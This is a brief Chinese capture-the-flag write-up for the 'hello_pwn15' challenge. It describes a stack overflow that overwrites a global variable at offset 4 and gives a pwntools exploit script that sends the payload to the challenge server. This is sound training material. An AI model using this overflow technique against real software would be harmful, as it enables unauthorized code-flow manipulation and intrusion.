[攻防世界 pwn]——hello_pwn15
- 题目地址: https://adworld.xctf.org.cn/
- 题目:

checksec

IDA, 利用栈溢出修改dword_60106C就好距离为4




exploit
from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",35304)
payload = 'a'*4 + p64(0x6e756161)
p.sendline(payload)
p.interactive()
本文介绍了参与攻防世界CTF比赛时遇到的一道名为`hello_pwn15`的题目,该题目涉及栈溢出漏洞。通过使用IDA分析,发现可以利用栈溢出修改内存中的特定地址。提供的exploit代码展示了如何构造payload,发送 payload 到远程服务器(111.200.241.244:35304),并成功交互以利用该漏洞。
2086





